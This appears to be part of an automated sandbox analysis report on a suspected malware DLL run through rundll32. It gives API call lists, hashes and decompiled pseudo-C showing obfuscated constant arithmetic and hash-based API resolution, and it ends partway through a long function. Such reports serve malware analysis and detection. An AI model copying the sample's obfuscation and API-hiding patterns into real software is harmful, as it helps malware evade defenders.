                                                                                                                                    • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                    • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                    • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                    • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 275 2c7f5d-2c7ff1 call 2d20b9 call 2daa30 CreateProcessW
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,002CAD99,?,?,?,181C8C04,002CAD99), ref: 002C7FEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction ID: 4a01f82819542599de40ac6609f012f20dba998087ce972e44cbeef95de00cfc
                                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction Fuzzy Hash: FD11D372402128BBDF619F91DD09CEF7F79EF193A4F149244FA1921121D2728A60EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 280 2d46bb-2d473b call 2d20b9 call 2daa30 SHGetFolderPathW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002D46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				void* _t21;
                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                    				void* _t26;
                                                                                                                                    
                                                                                                                                    				E002D20B9(_t21);
                                                                                                                                    				_v20 = 0x3f5bb0;
                                                                                                                                    				_v16 = 0;
                                                                                                                                    				_v12 = 0x996874;
                                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                                    				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                    				_v8 = 0xebf0af;
                                                                                                                                    				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                    				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                    				_t25 = E002DAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                    				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                    				return _t26;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 002D4735
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction ID: 462efabd92985115be13122997bb23a090fc0cdf6e5c16f12846d6ead5b9ed90
                                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction Fuzzy Hash: 0A01EC75801228BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 285 2c93ed-2c9461 call 2daa30 ExitProcess
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E002C93ED() {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    
                                                                                                                                    				_v28 = 0xda6c64;
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				asm("stosd");
                                                                                                                                    				_v12 = 0x88a564;
                                                                                                                                    				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                    				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                    				_v8 = 0xd9241f;
                                                                                                                                    				_v8 = _v8 * 0x5c;
                                                                                                                                    				_v8 = _v8 + 0xccdd;
                                                                                                                                    				_v8 = _v8 + 0x903;
                                                                                                                                    				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                    				E002DAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                    				ExitProcess(0);
                                                                                                                                    			}









                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 002C945B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction ID: 275ece5bf1528a1f808f5a3c2440b4fe08de92f4507372b77e3c58ddca27ba69
                                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction Fuzzy Hash: 94F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 305 2cb23c-2cb2c6 call 2d20b9 call 2daa30 lstrcmpiW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002CB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				void* _t27;
                                                                                                                                    				int _t32;
                                                                                                                                    
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t27);
                                                                                                                                    				_v12 = 0x6268;
                                                                                                                                    				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                    				_v12 = _v12 + 0xffff2919;
                                                                                                                                    				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                    				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                    				_v8 = 0xa46433;
                                                                                                                                    				_v8 = _v8 + 0x98ba;
                                                                                                                                    				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                    				_v8 = _v8 + 0xd5b0;
                                                                                                                                    				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                    				E002DAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                    				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                    				return _t32;
                                                                                                                                    			}








                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 002CB2C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1586166983-0
                                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction ID: b463f9d218cf8d87c31c43e2d114d27e5259489ac6a8a20af7cc9f58206c0dcc
                                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                    • Instruction Fuzzy Hash: 250116B2C04608FFDF45DFD4DD468AEBBB5EB54304F208189B90566262E3728F64AB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E002DE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int* _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				signed int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				signed int _v212;
                                                                                                                                    				signed int _v216;
                                                                                                                                    				signed int _v220;
                                                                                                                                    				signed int _v224;
                                                                                                                                    				signed int _v228;
                                                                                                                                    				signed int _v232;
                                                                                                                                    				signed int _v236;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _v244;
                                                                                                                                    				signed int _v248;
                                                                                                                                    				signed int _v252;
                                                                                                                                    				signed int _v256;
                                                                                                                                    				signed int _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				signed int _v268;
                                                                                                                                    				signed int _v272;
                                                                                                                                    				intOrPtr _v276;
                                                                                                                                    				signed int _v280;
                                                                                                                                    				signed int _v284;
                                                                                                                                    				signed int _v288;
                                                                                                                                    				signed int _t823;
                                                                                                                                    				void* _t829;
                                                                                                                                    				signed int* _t832;
                                                                                                                                    				signed int _t833;
                                                                                                                                    				signed int _t845;
                                                                                                                                    				signed int _t858;
                                                                                                                                    				signed int _t862;
                                                                                                                                    				intOrPtr _t868;
                                                                                                                                    				signed int _t888;
                                                                                                                                    				void* _t939;
                                                                                                                                    				void* _t948;
                                                                                                                                    				signed int _t956;
                                                                                                                                    				signed int _t957;
                                                                                                                                    				signed int _t958;
                                                                                                                                    				signed int _t959;
                                                                                                                                    				signed int _t960;
                                                                                                                                    				signed int _t961;
                                                                                                                                    				signed int _t962;
                                                                                                                                    				signed int _t963;
                                                                                                                                    				signed int _t964;
                                                                                                                                    				signed int _t965;
                                                                                                                                    				signed int _t966;
                                                                                                                                    				signed int _t967;
                                                                                                                                    				signed int _t968;
                                                                                                                                    				signed int _t969;
                                                                                                                                    				signed int _t970;
                                                                                                                                    				signed int _t971;
                                                                                                                                    				signed int _t972;
                                                                                                                                    				signed int _t973;
                                                                                                                                    				signed int _t974;
                                                                                                                                    				signed int _t975;
                                                                                                                                    				signed int _t976;
                                                                                                                                    				signed int _t977;
                                                                                                                                    				signed int _t981;
                                                                                                                                    				signed int _t984;
                                                                                                                                    				signed int _t985;
                                                                                                                                    				signed int* _t988;
                                                                                                                                    				void* _t991;
                                                                                                                                    
                                                                                                                                    				_push(_a44);
                                                                                                                                    				_v4 = __ecx;
                                                                                                                                    				_push(_a40);
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_push(_a36);
                                                                                                                                    				_push(_a32);
                                                                                                                                    				_push(_a28);
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx & 0x0000ffff);
                                                                                                                                    				E002D20B9(__ecx & 0x0000ffff);
                                                                                                                                    				_v284 = 0x99c43c;
                                                                                                                                    				_t988 =  &(( &_v288)[0xd]);
                                                                                                                                    				_v284 = _v284 + 0xbb14;
                                                                                                                                    				_v284 = _v284 >> 0xb;
                                                                                                                                    				_v284 = _v284 ^ 0x0000134f;
                                                                                                                                    				_t862 = 0;
                                                                                                                                    				_v120 = 0x27310;
                                                                                                                                    				_t977 = 0x329d839;
                                                                                                                                    				_t956 = 0x43;
                                                                                                                                    				_v120 = _v120 / _t956;
                                                                                                                                    				_v120 = _v120 + 0xe2f5;
                                                                                                                                    				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                                    				_v36 = 0x50046c;
                                                                                                                                    				_v36 = _v36 << 1;
                                                                                                                                    				_v36 = _v36 ^ 0x00a00810;
                                                                                                                                    				_v116 = 0x7f268a;
                                                                                                                                    				_v116 = _v116 ^ 0x5f915552;
                                                                                                                                    				_t957 = 0x1b;
                                                                                                                                    				_v276 = 0;
                                                                                                                                    				_v116 = _v116 * 0x3e;
                                                                                                                                    				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                                    				_v228 = 0xb299e8;
                                                                                                                                    				_v228 = _v228 >> 0xe;
                                                                                                                                    				_v228 = _v228 << 0x10;
                                                                                                                                    				_v228 = _v228 * 0x42;
                                                                                                                                    				_v228 = _v228 ^ 0xb8144000;
                                                                                                                                    				_v64 = 0x620921;
                                                                                                                                    				_v64 = _v64 | 0xbe88b167;
                                                                                                                                    				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                                    				_v172 = 0xae09b0;
                                                                                                                                    				_v172 = _v172 | 0xde677f7d;
                                                                                                                                    				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                                    				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                                    				_v132 = 0xc06abb;
                                                                                                                                    				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                                    				_v132 = _v132 / _t957;
                                                                                                                                    				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                                    				_v236 = 0x9fdac6;
                                                                                                                                    				_v236 = _v236 >> 4;
                                                                                                                                    				_v236 = _v236 + 0x9b65;
                                                                                                                                    				_v236 = _v236 * 0x7b;
                                                                                                                                    				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                                    				_v108 = 0xc74878;
                                                                                                                                    				_v108 = _v108 + 0x314b;
                                                                                                                                    				_v108 = _v108 * 0x41;
                                                                                                                                    				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                                    				_v196 = 0x1587ec;
                                                                                                                                    				_v196 = _v196 ^ 0x07496474;
                                                                                                                                    				_v196 = _v196 >> 7;
                                                                                                                                    				_t958 = 0x2c;
                                                                                                                                    				_v196 = _v196 / _t958;
                                                                                                                                    				_v196 = _v196 ^ 0x000054ad;
                                                                                                                                    				_v244 = 0xbebf62;
                                                                                                                                    				_v244 = _v244 << 0xb;
                                                                                                                                    				_v244 = _v244 + 0xffffca16;
                                                                                                                                    				_v244 = _v244 << 0xe;
                                                                                                                                    				_v244 = _v244 ^ 0x36858000;
                                                                                                                                    				_v72 = 0x750de5;
                                                                                                                                    				_v72 = _v72 | 0xb336b270;
                                                                                                                                    				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                                    				_v256 = 0xc175fb;
                                                                                                                                    				_t984 = 0x72;
                                                                                                                                    				_t959 = 0x28;
                                                                                                                                    				_v256 = _v256 * 0x26;
                                                                                                                                    				_v256 = _v256 >> 5;
                                                                                                                                    				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                                    				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                                    				_v76 = 0x1a7820;
                                                                                                                                    				_v76 = _v76 | 0xb8d3f172;
                                                                                                                                    				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                                    				_v224 = 0x97ff87;
                                                                                                                                    				_v224 = _v224 / _t984;
                                                                                                                                    				_v224 = _v224 >> 6;
                                                                                                                                    				_v224 = _v224 * 0x5d;
                                                                                                                                    				_v224 = _v224 ^ 0x0001effe;
                                                                                                                                    				_v40 = 0x7c0450;
                                                                                                                                    				_v40 = _v40 / _t959;
                                                                                                                                    				_v40 = _v40 ^ 0x000319b6;
                                                                                                                                    				_v136 = 0x260fad;
                                                                                                                                    				_v136 = _v136 + 0x622a;
                                                                                                                                    				_t960 = 0x1c;
                                                                                                                                    				_v136 = _v136 / _t960;
                                                                                                                                    				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                                    				_v288 = 0x61f743;
                                                                                                                                    				_t961 = 0x66;
                                                                                                                                    				_v288 = _v288 * 0x25;
                                                                                                                                    				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                                    				_v288 = 0x858eca;
                                                                                                                                    				_v288 = _v288 / _t984;
                                                                                                                                    				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                                    				_v280 = 0xcba1b8;
                                                                                                                                    				_v280 = _v280 / _t961;
                                                                                                                                    				_v280 = _v280 ^ 0xc2211053;
                                                                                                                                    				_v280 = _v280 + 0xffff75b7;
                                                                                                                                    				_v280 = _v280 ^ 0xc2279606;
                                                                                                                                    				_v288 = 0x614b46;
                                                                                                                                    				_v288 = _v288 >> 4;
                                                                                                                                    				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                                    				_v288 = 0x794624;
                                                                                                                                    				_v288 = _v288 + 0xb4d0;
                                                                                                                                    				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                                    				_v288 = 0xcdbe83;
                                                                                                                                    				_v288 = _v288 >> 0xf;
                                                                                                                                    				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                                    				_v288 = 0x24639d;
                                                                                                                                    				_t962 = 0x28;
                                                                                                                                    				_v288 = _v288 / _t962;
                                                                                                                                    				_v288 = _v288 ^ 0x000e4507;
                                                                                                                                    				_v288 = 0x4730ec;
                                                                                                                                    				_t963 = 0x21;
                                                                                                                                    				_v288 = _v288 / _t963;
                                                                                                                                    				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                                    				_v284 = 0xb301d9;
                                                                                                                                    				_t964 = 0x4e;
                                                                                                                                    				_v284 = _v284 / _t964;
                                                                                                                                    				_v284 = _v284 + 0x8c1d;
                                                                                                                                    				_v284 = _v284 ^ 0x00061f34;
                                                                                                                                    				_v280 = 0xfdcbf7;
                                                                                                                                    				_v280 = _v280 + 0x27a;
                                                                                                                                    				_v280 = _v280 + 0xffff891b;
                                                                                                                                    				_t965 = 0x46;
                                                                                                                                    				_v280 = _v280 / _t965;
                                                                                                                                    				_v280 = _v280 ^ 0x0008575c;
                                                                                                                                    				_v284 = 0xc1d3a0;
                                                                                                                                    				_v284 = _v284 >> 0xc;
                                                                                                                                    				_v284 = _v284 << 2;
                                                                                                                                    				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                                    				_v112 = 0xeee25;
                                                                                                                                    				_v112 = _v112 << 0xc;
                                                                                                                                    				_v112 = _v112 << 4;
                                                                                                                                    				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                                    				_v180 = 0x8a49b3;
                                                                                                                                    				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                                    				_v180 = _v180 + 0xffffa02a;
                                                                                                                                    				_v180 = _v180 | 0x7fd27f38;
                                                                                                                                    				_v180 = _v180 ^ 0xffd81443;
                                                                                                                                    				_v152 = 0x628374;
                                                                                                                                    				_v152 = _v152 >> 2;
                                                                                                                                    				_v152 = _v152 + 0xffff73d9;
                                                                                                                                    				_t966 = 0x2e;
                                                                                                                                    				_v152 = _v152 / _t966;
                                                                                                                                    				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                                    				_v28 = 0xe4a1af;
                                                                                                                                    				_v28 = _v28 + 0x32bc;
                                                                                                                                    				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                                    				_v160 = 0x595a50;
                                                                                                                                    				_v160 = _v160 + 0xffffdbfa;
                                                                                                                                    				_v160 = _v160 + 0xffffb344;
                                                                                                                                    				_t967 = 0x36;
                                                                                                                                    				_v160 = _v160 / _t967;
                                                                                                                                    				_v160 = _v160 ^ 0x0006861f;
                                                                                                                                    				_v88 = 0x4d7ad3;
                                                                                                                                    				_v88 = _v88 + 0xc28a;
                                                                                                                                    				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                                    				_v48 = 0xf1782b;
                                                                                                                                    				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                                    				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                                    				_v100 = 0x42ea8e;
                                                                                                                                    				_t985 = 0x2a;
                                                                                                                                    				_v100 = _v100 / _t985;
                                                                                                                                    				_v100 = _v100 ^ 0x000caa85;
                                                                                                                                    				_v148 = 0xa48e68;
                                                                                                                                    				_t968 = 6;
                                                                                                                                    				_v148 = _v148 / _t968;
                                                                                                                                    				_v148 = _v148 << 0xc;
                                                                                                                                    				_v148 = _v148 ^ 0xb6d58e9e;
